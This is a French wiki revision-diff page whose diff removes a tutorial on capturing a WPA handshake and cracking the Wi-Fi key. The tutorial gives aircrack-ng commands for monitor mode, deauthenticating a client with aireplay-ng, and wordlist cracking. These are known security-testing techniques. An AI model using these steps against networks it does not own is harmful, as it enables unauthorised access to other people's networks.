Outils pour utilisateurs

Outils du site


reseau:recuperer_un_handshake_wpa

Différences

Ci-dessous, les différences entre deux révisions de la page.

Lien vers cette vue comparative

reseau:recuperer_un_handshake_wpa [2016/02/02 12:50]
arkinar
reseau:recuperer_un_handshake_wpa [2016/07/04 08:38]
Ligne 1: Ligne 1:
-**WPA** 
  
-Wi-Fi Protected Access (WPA et WPA2) est un mécanisme pour sécuriser les réseaux sans-fil de type Wi-Fi. 
-Le WPA était une norme temporaire pour palier au manque de sécurité du WEP. Il a été implementé dans l'​idée d'​être remplacé par le WPA2. 
- 
-Il utilise deux types d'​authentifications : 
- 
-- TKIP (Temporal Key Integrity Protocol) : une clé de 128 bits est utilisée pour chaque paquet. On génère une nouvelle clé pour chaque paquet. 
- 
-- CCMP : un mécanisme de chiffrement qui s'​appuie sur AES et qui est plus robuste que le TKIP. 
- 
- 
-__Vocabulaire utilisé :__  
- 
-- BSSID : est l'​adresse mac du point d'​accès wifi. 
- 
-- ESSID : est le nom du reseau wifi (exemple: Bbox-AFXXX) 
- 
-- Handshake : est un échange de clé entre un routeur wifi et un client. 
- 
-- Channel : est le canal sur lequel est diffusé le reseau wifi. 
- 
-Sur les réseaux des particuliers le WPA PSK est utilisé (Preshared key). 
- 
-Il utilise le TKIP comme authentification. 
- 
- 
-Pour commencer assurez vous que votre carte wifi supporte le monitoring. 
- 
-Pour l'​activer : 
- 
-<​code>​airmon-ng start wlan0</​code>​ 
- 
-Dans mon cas wlan0 est mon interface wifi. 
- 
-Nous allons ensuite lister les wifi en WPA : 
- 
-<​code>​airodump-ng --encrypt wpa mon0 </​code>​ 
- 
---encrypt permet de filtrer les réseaux wifi par chiffrement 
- 
- 
-mon0 est notre interface de monitoring 
- 
-Pour obtenir un station : 
- 
-<​code>​airodump-ng -a -c [chan] --bssid [APmac] -w [outfile][iface]</​code>​ 
- 
-Dès qu'une station apparait : 
- 
-<​code>​aireplay-ng -0 1 -e [ESSID] -a [BSSID] -c [Client MAC] [iface]</​code>​ 
- 
-augmenter le 1 si ça n'a pas suffit à obtenir un handshake. 
- 
-Pour vérifier si le handshake est capturé lancer 
- 
-<​code>​aircrack-ng outfile.cap</​code>​ 
- 
-__pour le obtenir la clé :__ 
- 
-<​code>​aircrack -w dictionnaire -b [bssid] outfile.cap </​code>​ 
reseau/recuperer_un_handshake_wpa.txt · Dernière modification: 2016/07/04 08:38 (modification externe)